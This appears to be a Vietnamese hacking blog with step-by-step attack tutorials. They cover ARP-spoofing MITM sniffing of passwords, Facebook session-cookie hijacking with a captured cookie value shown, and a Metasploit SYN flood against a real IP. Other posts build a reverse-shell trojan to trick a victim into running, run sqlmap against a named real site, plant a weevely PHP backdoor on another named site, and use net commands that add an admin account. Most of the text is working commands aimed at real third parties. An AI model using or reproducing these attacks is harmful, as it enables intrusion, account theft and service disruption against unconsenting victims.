Thứ Bảy, 30 tháng 3, 2013

MITM


Man In The Middle . 

Phương pháp tấn công đc hình dung qua chính cái tên gọi của nó.Là một phương pháp cơ bản và làm nền tảng chung cho nhiều kĩ thuật tấn công.Ở đây attacker đóng vai trò là người trung gian,đứng giữa,giả mạo trong phiên làm việc giữa victim và một máy chủ nào đó.Mọi gói tin xuất phát từ victim đến máy chủ hay ngược lại đề đi qua máy attacker ,nếu đc attacker forward .
Xem mô hình dưới đây:

    Ta thấy attacker đã chèn vào giữa phiên giao dịch của victim và máy chủ.Vậy làm sao attacker làm đc điều này.Và các công cụ sniffer dùng phương pháp MITM như thế nào.
    Đầu tiên nói sơ qua cơ chế giao tiếp bình thường giữa victim và máy chủ khi attacker chưa tác động lên hệ thống.Khi 2 host giao tiếp với nhau,chúng cần địa chỉ nguồn và địa chỉ đích đến.Và do hiện nay người ta dùng các giao thức khác nhau trên tầng giao vận(IP,IPX) ,chính vì thế dẫn đến việc không thống nhất đối với các thiết bị .Có thể thiết bị này tương thích nhưng thiết bị khác lại không.Chính vì vậy sinh ra việc dùng ip MAC.Xem như là một tiêu chuẩn chung tương thích với các thiết bị khác nhau.Nhưng làm sao để từ IP có thể phiên ra ip MAC và ngược lại.Việc phiên dịch này là do giao thức ARP (address resolution protocol) thực hiện.
  Ta xem xét một bản tin ARP để thấy được việc phiên dịch IP-MAC.Một bản tin arp gồm các trường sau:


Hardware type :Qui định kiểu của phần cứng.
HW addr length : Cho biết độ dài của địa chỉ MAC ( ghi bằng mã hex)
Protocol type : Cho biết kiểu của giao thức.
Protocol addr length : Cho biết độ dài của địa chỉ IP
Opcode : thể hiện đây là bản tin request (1) hay là bản tin reply (2)
Các trường còn lại như source hardware address ,source protocol address,destination hardware addres ,destination protocol addresss cho biết địa chị vật lí và địa chỉ ip của máy nguồn và máy đích.

Một bản tin arp với thông tin cụ thể có dạng như sau

Ở ví dụ này miêu tả một bản tin của một máy có IP là 192.168.1.1 gửi một bản tin request đến máy có ip là 192.168.1.2
Quá trình đi của gói tin như sau.Máy có ip LÀ 192.168.1.1 gửi một request trong đó có chứ ip và mac của nó,kèm với ip đích đến. Module address resolution sẽ có nhiệm vụ chuyển địa chỉ logic của đích đến thành địa chỉ vật lí.Tiếp tục nó so sánh cặp địa chỉ này với bảng ánh xạ lưu trên ARP cache.Nếu trung lặp thì nó ghi các giá trị này vào ,rồi gửi lại về máy chủ dưới dạng bản tin reply .Nếu không trùng lặp thì nó sẽ gửi tiếp bản tin ARP request đến địa chỉ đích là địa chỉ broadcast (để có thể hỏi hết tất cả máy có trong mạng lan).

Hình thức tấn công này chỉ có tác dụng thực trên mạng LAN.Vì nếu trên mạng WAN,Tại các nut mạng router nó có khả năng ngăn chặn các gói tin broadcast.

Căn cứ vào cơ chế như vậy.Attacker đứng giữa.Liên tục gửi những gói arp reply cho máy chủ và liên tục gửi các gói arp request cho victim.Làm cho cả máy chủ lẫn victim đều hiểu nhầm đối tượng mình đang giao tiếp là ai.

Hiện nay có rất nhiều tool dùng nguyên lí này để sniff các thông tin .Ví dụ như dsnif,ettercap,cain  ,sniffer pro,wireshark,Network Monitor,Ethereal.
Chúng ta sẽ demo các công cụ này.

Đây tiên là demo giả mạo arp trên backtrack [ Phần này mình lấy từ blog capuchino cho nhanh ]


Đầu tiên mở terminal lên.
sửa lại file ip_forward bằng lệnh echo và toán tử viết chèn vào cuối file >> (để cho phép ip đc forward)
sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
xong rồi đọc lại file này xem đã ghi thành công chưa nhé,nếu nhận đc là 1 thì là oke
cat /proc/sys/net/ipv4/ip_forward
giả sử ip của victim là 192.168.201.129
trong đó gateway là 192.168.201.2

ta tiếp tục
arpspoof -i eth0 -t 192.168.201.2 192.168.201.129
(nó update lại bản arp cache)
sau khi nó chạy,thì terminal này bị busy,ta ko thể thao tác lệnh tiếp,vì nó phải giữ session lại.
Rất may trên backtrack cho phép ta thao tác đa nhiệm.
Mở 1 terminal khác lên,gõ screen rồi enter .


trên terminal mới tiếp tục
arpspoof -i eth0 -t 192.168.201.129 192.168.201.2




lúc này thì 2 terminal trong nó như vậy.

tiếp tục do terminal này bận nên ta tiếp tục mở 1 terminal khác,type screen và enter.
trên terminal mới ta mở trình driftnet lên
type:sudo driftnet -i eth0.


tiếp tục mở terminal mới,type screen rồi type tiêp
sudo urlsnarf -i eth0
bây giờ nó sẽ lắng nghe trên các port 80,8080 hoặc 3128


Giải sử bi giờ trên victim vào trang google tìm với từ khóa capuchino chẳng hạn nha
thì trên driftnet của mình sẽ bắt đc gói tin hình ảnh truyền về ip 192.168.201.129


đây là hình ảnh trên victim:


đây là hình ảnh get đc và hiện lên driftnet:


tương tự như thế,đối với các trang khác mình cũng xem đc thông tin.biết đc victim làm gì.Xem trên terminal.
Chẳng hạn như xem hình dưới đây,ta thấy victim đang lượn lờ trong vhbsystem




Cain and Abel:

Mình demo bộ tool này trên win7.
đầu tiên down Cain and Abel về ở đây http://www.softpedia.com/progDownload/Cain-and-Abel-Download-38678.html
trước khi cài đặt Cain cần cài đặt WinPcap trước,để tí nữa nó tự tìm card mạng cho mình.Tải WinPcap về ở đây http://www.winpcap.org/install/default.htm
Sau khi cài đặt ,trước khi chạy thì ta chú ý tắt tường lửa đi.Vì để tường lửa có thể sẽ không thực hiện đc.
Mở cain lên chúng ta thấy giao diện ban đầu của nó như sau :



Đầu tiên cần phải config cho nó,ta vào Configure chọn Netword Adapter thích hợp




Sau đó chúng ta scan danh sách host có trong mạng nội bộ.Ấn vào biểu tưởng dấu + màu xanh (hoặc chọn trên thành menu File -Add to list).Rồi Ok


CHuyển sang tab ARP


Kích lên khung trống rồi chọn tiếp biểu tượng + màu xanh để add host victim cần tấn công vào (File - Add to list )

Ta kích chọn vào địa chỉ default gateway đầu tiên rồi Add để add tất cả các host trong mạng nội bộ vào.Tiếp theo chọn victim cần tấn công giả mạo ARP rồi ok.Victim mình chọn ở đây có IP là 192.168.247.128 nhé.

ta kích tiếp vào đối tượng ta vừa add vào rồi chọn Start Arp 



Ta sẽ thấy từ chế độ idle nó sẽ chuyển sang chế độ Poisonning 

bây giờ ta sẽ chờ đợi lắng nghe và bắt các gói tin khi victim giao tiếp với máy chủ.Ví dụ như trên máy victim thực hiện một giao tiếp với giao thức http .Ta bắt được như sau 


tương tự với nhiều gói tin khác cũng thế.Căn bản của việc dùng cain là vậy.Có thời gian các bạn nên nghiên cứu kĩ hơn.Các chức năng mà cain tích hợp.Có rất nhiều lựa chọn làm đa dạng quá trình tấn công,ví dụ như có các option giúp chúng ta chọn một IP hoặc MAC giả mạo,hoặc có thể dùng chính địa chỉ của chúng ta.Vân Vân.

Ettercap:Bộ công cụ được mệnh danh là Lord of the tokenring.

Trên thực tế thì đây là bộ công cụ dùng để phân tích các gói tin đc trao đổi với máy tính.Nguyên tắc làm việc của nó cũng là giả danh địa chi MAC để cho máy đích và máy nguồn nhầm tưởng là đang trao đổi thông tin với nhau.Nhưng thực chất là qua máy có cài ettercap.
Mình sẽ trình bày demo về ettercap với Backtrack .Nếu không có bạn có thể tải về và chạy trên mọi hệ điều hành.
Bộ ettercap đc hỗ trợ nhiều interface khác nhau.
ở đây có 4 interface,mình demo với curses GUI và GTK+GUI
để vào giao diện curses GUI ta gõ dòng lệnh
#ettercap -C
Giao diện xuất hiện như thế này



Ta cấu hình cho nó như sau
Đầu tiên vào Sniff - Unified sniffing để chọn card mạng
Sau khi chọn card mạng rồi thì bắt đầu sniff .Vào Start snifing 

Lúc này đang ở chế độ lắng nghe.Nếu trên mạng nội bộ có một máy nào đó thao tác giao tiếp với mạng,Thì ta có thể bắt đc các bản tin này.


ở đây cho thấy có một victim trong mạng lan và  máy đich có địa chỉ ip 115.77.208.206 có trao đổi các gói tin với nhau với nội dung thông tin có chứa user và pass.Đây là chúng ta bắt gói tin một cách tràn lan trên mạng nội bộ.Muốn bắt đc chính xác từ một victim nào đó.Mà chúng ta mục đích sẵn.Thì đầu tiên ta scan host
Trên menu bar chọn Hosts - Scan for host
Nó sẽ scan toàn bộ netmask cho  chúng ta.Tiếp theo ta chọn tấn công theo hình thức giả mạo ARP .Vào menu MITM - Arp poisoning

Chọn xong nó sẽ hiện ra khung báo chọn parameter,ta bỏ qua không chọn nhấn enter.Nhận đc User messages như sau:



Để tìm tên victim chúng ta muốn bắt bản tin tao vào Menu :View -Connections 


Gói host nào đang ở chế độ active thì ta có thể bắt đc.Và xem nó bằng cách kick vào host đấy,bản tin xem được đc viết dưới dạng đã mã hóa 

Để lưu lại thì ta chọn Logging - Log all packets and infos....
để sau này ta có thể xem lại.


Đối với interface dùng GTK+GUI thì dễ dùng hơn.Mở lên bằng lệnh
#ettercap -G


tương tự Chọn Sniff -> Unified sniffing


Chọn card mạng 


Scan host:Hosts->Scan for hosts


Chọn tiếp :Hosts  ->host list hiện ra như sau




Add gateway vào target 2 và victim vào target 1 , rồichọn Mitm -Arp Poisoning , hiện ra optional parameters


tiếp theo Start - Start sniffing để bắt đầu sniff thôi .
Đây là một bản tin có chứa user và pass ta sniff đc từ victim 



Bộ công cụ test wireshark (Phần này lấy từ blog capuchino .Lần trứoc hướng dẫn capuchino,nên giờ lấy lại công gõ).


đầu tiên ta tải bộ công cụ scan wireshark ở trang chủ wireshark.org về cài đặt.Trước khi cài đặt cái này thì phải tại winPcap về đã.Để tí nữa nó tìm card mạng cho mình [ trang chủ của winPcap ở đây nhé http://www.winpcap.org/install/default.htm ].
Tải xong về mở lên thì đại loại nó có giao diện như thế này



Ta kích vào Interface list để hiện ra danh sách card mạng.
Chọn card mạng mình cần scan.


Sau khi khung capture Interfaces hiện lên thì chọn card [ hoặc network cần scan nhé ].
Bấm start.
Sau khi scan một lúc thì cho nó dừng lại.Scan vừa đủ thôi,chứ chờ nó xong lâu lắm.Tùy lúc mà cho nó dừng lại .

ta thấy các session mà nó scan đc,thông qua các giao thức khác nhau .




Ta mở khung search lên để dễ tìm thấy mục tiêu (Ctrl f)
hoặc Edit /Find packages

Mở lên rồi ta chọn các tùy chọn như search string,Package details




rồi nhập vào chữ datr (cái này là kinh nghiệm thôi,trong cookie facebook nó có chữ này ấy mà.

sau khi seach xong 
ta tìm đc một đối tượng như sau 


ta thấy ngay dòng [truncated ] cookie:datr.....
copy dòng này ra notepad,lấy 2 trường sau,cho vào addon cookie manage của firefox 
c_user=100004847377632; xs=60%3AWKLE4Ztc9cjSBg%3A0%3A1363298090
để copy đc thì ta kích chuột phải chọn copy/bytes/Printable text only 

sau đó add các trường này vào cookie manager
bấm add ,tương tự nhập cho trường xs







f5 và xem thành quả.



















Thứ Sáu, 15 tháng 3, 2013

Các tầng mạng OSI

Mô hình mạng OSI ( Open systems interconnection Reference Model ) .Là mô hình miêu tả cách xây dựng hệ thông giao tiếp mạng. Mô hình này phân chia chức năng của giao thức thành nhiều tầng,Ở đây là 7 tầng.Mỗi tầng có một chức năng khác nhau.Có tầng tương ứng với phần cứng,có tầng tương ứng với phần mềm.Đi theo chiều từ tầng 1 đến tầng 7 cũng là đi theo chiều từ phần cứng đến phần mềm .(Từ những cái trừu tượng đến các tương tác trực tiếp với người dùng).

Tìm hiểu về mô hình OSI ,ta sẽ có cái nhìn tổng quan,và hiểu được rõ hơn các phương pháp tấn công mạng.Tấn công vào tầng nào dễ hơn chẳng hạn.Và tầng nào có thể tấn công.Và vì sao lại chọn tần đó để tấn công.

Capuchino liệt kê ,và nêu một số điểm cơ bản của 7 tầng.

Tầng 1: tầng vật lý ( Physical ).

 Tầng này tương ứng với các thiết bị vật lí như cap ,hub và một số thiết bị tiếp hợp mạng và máy chủ khác.

Tầng 2: Tầng liên kết dữ liệu ( Datalink )


Tầng này là nơi họac động của các thiết bị chuyển mạch ( như switch ).
Ở tầng này chúng đề cập đến khái niệm MAC . Trên đường truyền thì các nut mạng Lan gửi gói tin cho nhau thông qua địa chỉ IP,nhưng trước khi vào đến phần cứng, thì địa chỉ IP này đc chuyển đổi sang địa chỉ MAC.Và để phân giải từ địa chỉ IP sang địa chỉ MAC ta có giao thức ARP ( Address access protocol ).Đồng thời trên vùng này cũng dành ra bộ nhớ lưu trữ các địa chỉ  MAC và IP để tăng tốc họat động. (Để kiểm tra có thể dùng lệnh arp -a ,trên winxp thì thấy nó hiện ra luôn địa chỉ MAC ,nhưng trên win8 thì ko :( ).

Trong phương pháp tấn công MITM (man in the middle ).Nó tấn công vào tầng dữ liệu này.Giả mạo gói dữ liệu ARP ,liên tụcgửi lại cho host_gửi 1 gói tin ARP reply khi nhận đc gói ARP request,từ đó mạo danh victim.Làm nhầm lẫn thông tin lấy về đc của host_gửi_đi_gói_tin.

Phương pháp tấn công MITM

MITM [ man in the middle ] - Là một phương thức tấn công của attacker,trong đó attacker đứng giữa,nhận thông tin trao đổi giữa 2 đầu truyền tin.Bên A truyền cho bên B,thông tin sẽ đi từ A qua attacker rồi mới đến B .Và tất nhiên attacker có thể xem và thay đổi thôi tin trước khi truyền đến đích.Hôm nay capuchino có đọc qua tài liệu về các thiết bị giao tiếp mạng .Trong đó có cơ bản là Hub, Switch,Router.....

Trong đó cơ chế bảo mật đi từ thấp đến cao.Hub chỉ chia ra các cổng,nhưng các gói tin đi qua nó,đều qua các cổng hết,đến khi nào nó đến máy thì mới xem đó có phải là đích đến thích hợp hay ko.Điều này rất nguy hiểm trong mạng Lan .Vì như thế nghĩa là bất kì máy nào cũng có thể bắt các gói tin này.

Đối với Switch thì khác.Switch là một thiết bị thông minh hơn Hub vì trên Switch có lưu trữ địa chỉ Mac của các máy đến.Điều này có nghĩa là các gói tin đến switch nó xem như đã xác định đc đích đến là đâu.Ko cần phải tới máy đích nữa.Điều này đảm bảo gói tin đến đc đúng đích.Đồng thời nó cũng đảm bảo đc ko có xung đột có thể xảy ra.

Router thì còn thông minh hơn Switch nữa.Trên nó lưu trữ rất nhiền thông tin.Từ các giao thức,tính toán đường đi,tốc độ,độ tin cậy.Và bảo mật cũng tốt hơn.Kiến thức capuchino có hạn nên ko trình bày sâu đc.hihi.

Trở lại với MITM.
Ở cây capuchino trình bày về giả mạo ARP.Phương pháp tấn công này rất là lợi hại,nó có thể vượt qua bảo mật và sự thông minh của switch và router.
Nói rõ hơn 1 tí về giao thức ARP ( tên đầy đủ là address resolution Protocol) .nguyên tắc làm việc của ARP là là ghi chép và phân tích các địa chị IP và địa chỉ MAC tương ứng.Giả sử như ta có 2 host là host1 và host2 chẳng hạn.Vậy việc truyền tin giữa 2 host này như thế nào.Để truyền đc tin thì phải xác định đích đến cái đã.để làm đc việc này host1 gửi một gói tin ARP [ yêu cầu tìm địa chỉ MAC của host2 có ip là IP2 đi) .Gói ARP này sẽ hỏi các host xem nó có IP2 ko,nếu đúng thì gửi lại địa chi MAC cho nó [ gói truyền đi là gói ARP request chứa MAC máy gửi đi và IP của máy cần tìm,Gói về là gói ARP reply chứa MAC của máy đã tìm đc,hoặc thêm gì nữa thì capuchino ko rõ nha, vì sao phải lấy địa chị MAC mặc dù có IP gửi rồi.Cái này có liên quan đến cấu trúc mạng,chưa 7 tầng (cấu trúc mạng OSI)].Như vậy sẽ xác định được điểm đến..Như đã nói ở trên.Việc phân tích MAC-IP này nằm trên switch.Vậy đánh lừa như thế nào để lấy đc thông tin trên đường truyền đây.Chúng ta sẽ gửi liên tiếp các gói ARP reply ,trong đó có chưa MAC của máy mình tới máy chủ,và làm cho nó nghĩ MAC đó là MAC của victim.Và nó nhầm tưởng ta là đích đến.

Mình sẽ làm demo về phương pháp tấn công này nhé.

Đầu tiên mở terminal lên.
sửa lại file ip_forward bằng lệnh echo và toán tử viết chèn vào cuối file >>
sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
xong rồi đọc lại file này xem đã ghi thành công chưa nhé,nếu nhận đc là 1 thì là oke á
cat  /proc/sys/net/ipv4/ip_forward
giả sử ip của victim là 192.168.201.129 nhé
trong đó gateway là 192.168.201.2

ta tiếp tục
arpspoof -i eth0 -t 192.168.201.2 192.168.201.129 

sau khi nó chạy,thì terminal này bị busy,ta ko thể thao tác lệnh tiếp,vì nó phải giữ session lại.
Rất may trên backtrack cho phép ta thao tác đa nhiệm.
Mở 1 terminal khác lên,gõ screen rồi enter .

trên terminal mới tiếp tục
arpspoof -i eth0 -t 192.168.201.129  192.168.201.2

Thứ Năm, 14 tháng 3, 2013

Một số thủ thuật connect vào VICTIM

[Sưu tầm,có mấy chỗ sai tè le ]
Phần 1 : Net

Chỉ cần bạn có được User và Passwords của một IP nào trên Net…thế là bạn có thể kết nối một IPC$ rồi đấy….bây giờ tui xin ví dụ là bạn có được User là hbx và passwords : 123456…IP : 127.0.0.1 
Hãy mở trình Ms dos và gõ vào lệnh sau :
Code:
Net use \\127.0.0.1\ipc$ “123456″ /user:”hbx”
để kết nồi một IPC$ với máy victtim, nhưng thao tác tiếp theo..bạn nhất thiết phải login xong mới có thể sử dũng
———————————————————————————————–
bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới …
chúng ta cộng thệm môt user mới là heibai và password là lovechina
Code:
Net user heibai lovechina / add
nếu bạn thành công..thì có thể cộng user này vào nhom Adminstrator
Code:
Net Localgroup Adminstrator heibai / add
—————————————————————————————————-
trong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên computer
Code:
Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ )
Z là của mình…còn C$ là của Victim
—————————————————————————————————� ��-
Phần 2 : AT

Hack tài khoản facebook bằng cách ăn cắp session [attack session hijacking]

Tiếng anh nó có cái tên là attack session hijacking.Nó được miêu tả là một phương pháp tấn công bằng cách lấy các session đc lưu sau khi nguời dùng đăng nhập.Sau đó giải mạo chính các session này để đăng nhập.Session thường được lưư trong các cookie.Trong các bài check vvb cũng có bài ăn cắp session thông qua bug search.Ở đây cũng tương tự như vậy.Nhưng để ăn cắp đc session của facebook thì ko có thông qua bug nào hết.Mà ta chặn bắt các gói thông qua switch [ Capuchino cũng chưa hiểu cơ chết họat động khác nhau giữ switch và router lắm,cái này nghiên cứu sau vậy].Đại loại thế.Bắt đầu nào
đầu tiên ta tải bộ công cụ scan wireshark ở trang chủ wireshark.org về cài đặt.Trước khi cài đặt cái này thì phải tại winPcap về đã.Để tí nữa nó tìm card mạng cho mình [ trang chủ của winPcap ở đây nhé http://www.winpcap.org/install/default.htm ].
Tải xong về mở lên thì đại loại nó có giao diện như thế này


Một số code gắn trojan vào site [ sưu tầm]



Cách 1 :
Cách đính kèm trojan vào website
Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm ..
Xin giới thiệu với các bạn 1 số cách
a,Dùng 1 đoạn mã javascript để mở và phát tán trojan
<script language=javascript>
open(”địa chỉ con trojan”);
</SCRIPT>
Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra
b,
bạn copy vào notepad đoạn mã sau:

Thứ Tư, 13 tháng 3, 2013

DDOS tcp synflood với Backtrack

Capuchino xin giới thiệu một phương pháp ddos rất nổi tiếng [ nên chỉ giới thiệu cho newbie thui nha ].Đó là phương pháp attack tcp synflood.Phương pháp này được phát triển dựa trên cơ chế gửi các request lên server.[ Cơ chế scan port cũng tương tự như vậy].Attacker gửi các gói lên,nếu server gửi lại các gói trả lời qua 1 port nào đó,thì ta xác định đc port này mở hay đóng.Cơ bản là như vậy,vì còn các cách gửi khác nhau,bởi các phương pháp khác nhau nữa,đôi khi gửi request mà server ko trả lời .Thì port đc gửi request đó lại đc mở.Lang thang thế,vào vấn đề chính,các gói đc gửi ở đây (gói gửi đi là gói SYN).Nếu đc gửi đến 1 server nào đó,với một số lượng quá nhiều ,nó làm cho bộ nhớ trên server,dùng để ghi lại các gói dữ liệu bị đầy.Dẫn đến cạn kiệt tài nguyên,nên đơ luôn.Nhưng tất nhiên là ko dễ để làm server cạn kiệt tài nguyên như thế.Vì server nó tính sẵn rồi.Để tránh việc cạn kiệt bộ nhớ này,nên nó chỉ lưu ,và ghi nhận 1 số request mà thôi.Số còn lại bị từ chối.Do có quá nhiều kết nối như vậy nên dẫn đến một số kết nối hợp lệ bị oan mà cũng bị từ chối luôn.


Vào terminal type:msfconsole
tiếp tục type:use auxiliary/dos/tcp/synflood
tiếp tục set các tham số cho nó
set RHOST 221.132.33.12
set TIMEOUT 500
set RPORT 80
set SNAPLEN 65535
run
 trong dó SNAPLEN là số byte .
Xong ngồi chờ thành quả thui.

Dùng backtrack hack win7 64bit

Capuchino có trình bày mấy bài về dùng backtrack và các bộ công cụ của nó để tạo trojan connect ngược về rồi,Bài này capuchino trình bày tiếp,với đối tượng là win7 64 bit nhé.
đầu tiên là vào bộ Social-Engineer-Toolkit-SET
cd /pentest/exploits/set
nếu vào mà ko có thì tải nó về máy vậy
vào cd /pentest/exploits/
xong rồi type:svn co http://svn.secmaniac.com/social_engineering_toolkit set/


Tải về đại loại nó như vậy nhé.Xong rồi vào thư mục set
cd set
ls
xong rồi tiếp nhé
type: ./set

DDOS server open port 3389 dùng Backtrack

Hôm nay capuchino lượn lờ trong vhb thấy có bài http://vhbsystem.net/@4rum/showthread.php?1108-Send-Socket-Window-Qua-Port-Remote-3389&p=6090
thấy trong bài có vài victim mở port 3389,nên nhân tiện capuchino viết tutorial ddos server mở port này.
đầu tiên để kiểm tra victim có mở port này ko,chúng ta dùng nmap để scan nhé.
victim demo ở đây là mugiaitri.net



Thứ Hai, 11 tháng 3, 2013

Tạo trojan ,attack win xem webcam,kill antivirus

Đầu tiên ta tạo một con trojan để gửi cho victim nhé.
Mở terminal lên type
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.201.132 LPORT=4444 X > /root/Desktop/capuchino.exe


Lệnh này tạo ra một con trojan tên là capuchino.exe trỏ về host  là LHOST=192.168.201.132 [IP máy mình ấy ,dùng ifconfig để lấy ip máy mình nhé ] Port lắng nghe là 4444 ,file trojan tạo ra nằm ở Desktop.
Sau khi tạo ra con trojan này thì tìm cách lừa đưa victim chạy :))

Rồi ta mở msfconsole lên
type:msfconsole
tíếp type như sau
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.201.132
 ở đây là ip máy mình ấy lhost nghĩa là local host,còn rhost nghĩa là remote host
exploit

Chủ Nhật, 10 tháng 3, 2013

Cách chạy phần mềm trên Backtrack [linux tương tự luôn]

Trong linux các phần mềm có thể được đóng gói dưới nhiều dạng khác nhau,chính vì vậy mà để chạy đc các phần mềm này chúng ta cũng phải dùng các cách khác nhau,mình giới thiệu sơ qua vài cách nha.

trước tiên là ta xét các gói đc down về máy bằng lệnh wget nhé.

Đối với file .deb


file này trên ubuntu do có application sẵn để đọc nó rồi,nên chỉ cần kích đôi là nó chạy à,còn trên backtrack thì chưa có.ta có thể chạy file này bằng lệnh
dpkg -i name_file.deb

chú ý là khi tải về phải tải đúng phiên bản nha,đối với backtrack 32 bit thì ta tải các gói có đuôi là i386
mình ví dụ như

wget https://dl.google.com/linux/direct/google-chrome-stable_current_i386.deb
còn đối với backtrack 64bit thì đuôi thường là amd64 nhé
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
Khi chạy thì ta chạy như sau
dpkg -i google-chrome-stable_current_amd64.deb
dùng phím tab để gõ nhanh chóng tên file nhé.hoặc gõ thế này cho nhanh nè
dpkg -i google*.deb


ĐỐi với các gói đc nén dưới dạng tar ,tar.gz ,tar.bz2...

thì trước tiên ta phải bung nén ra nhé,bung nén ra bằng các lệnh tương ứng như sau
tar zxvf file.tar.gz
tar xvf file.tar
tar zxf gile.tgz
[tgz = tar.gz]
tar jxf file.tar.bz2
tar jxf file.tbz2
[tbz2 = tar.bz2]
ở đây các tuy chọn đc mô tả như sau
-x là lệnh thực thi bung file
-z là đối với các file đc nén dạng gzip
-j là đối với các file được nén dạng bzip
-v đã để cho ta thấy danh sách cách file đang bung
-f là cho nó hiểu ta đang thao tác với file
sau khi giải nén xong,chúng ta di chuyển đến thư mục mới tạo ra nhé,và vào trong đó,thao tác tiếp
đầu tiên là

SQLi dùng bộ sqlmap trong backtrack 5

Lần trước đã có bài check sqli bằng bộ công cụ Darkmysql,hôm nay capuchino trình bày check sqli bằng bộ công cụ sqlmap trong backtrack 5 .Victim demo vẫn là autohoabinh.com nhé.
link lỗi sqli  http://autohoabinh.com/?page=products_detail&id=296&catid=2'
Vào thư mục chưa bộ công cụ sqlmap
cd /pentest/database/sqlmap/

đầu tiên ta get database nhé

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" --dbs

ở đây --dbs là databases
thêm 1 số cái nữa như

--dbs                DBMS databases
--tables             DBMS database tables
 --columns         DBMS database table columns
 --schema          DBMS schema
 --dump             dump dữ liệu

'

Tạo Backdoor bằng weevely trong backtrack5

Để tạo 1 backdoor đơn giản nhất đã encrypte ta có thể dùng bộ công cụ weevely trong backtrack 5.Con backdoor tạo ra có thể vượt đc anti,ko bị phát hiện.
đầu tiền mở terminal lên,vào thư mục chứa công cụ
cd /pentest/backdoors/web/weevely 
xem các file có trong này

Tạo một con backdoor bằng cấu trúc lệnh như sau
./weevely.py generate capuchino /root/Desktop/capuchi.php
trong đó /root/Desktop/capuchi.php là tên file và vị trí nó nằm capuchino là password đc set nhé


generate là lệnh tạo ra file,nhờ nó mà sau này ta có thể connect với con backdoor này bằng chính bộ weevely.

ta ví dụ như sau,up con backdoor này lên một server nào đó nhé.Mình lấy 1 ví dụ bằng 1 con shell đc share trên vhb ha.
victim bị upshell lên là topvn.vn
link shell là http://topvn.vn/sanpham/capuchi.php

Thứ Bảy, 9 tháng 3, 2013

Fake IP MAC trên backtrack

Mở terminal lên thao tác nhanh như sau để change mac ip address mặc định.
ifconfig    //để xem thông tin chung


ifconfig eth0 down
macchanger -r eth0 
giá trị -r ở đây là để lấy địa chị bất kì ngẫu nhiên nào đó,nếu muốn set một giá trị mac ip address nào đó mà mình muốn thì gõ như sau
macchanger --mac=XX:XX:XX:XX:XX:XX eth0
trong đó giá trị XX:XX:XX:XX:XX:XX là ip mac mới


Tất nhiên là nên lấy ngẫu nhiên sẽ tốt hơn
ifconfig eth0 up
ifconfig để xem kết quả




capuchino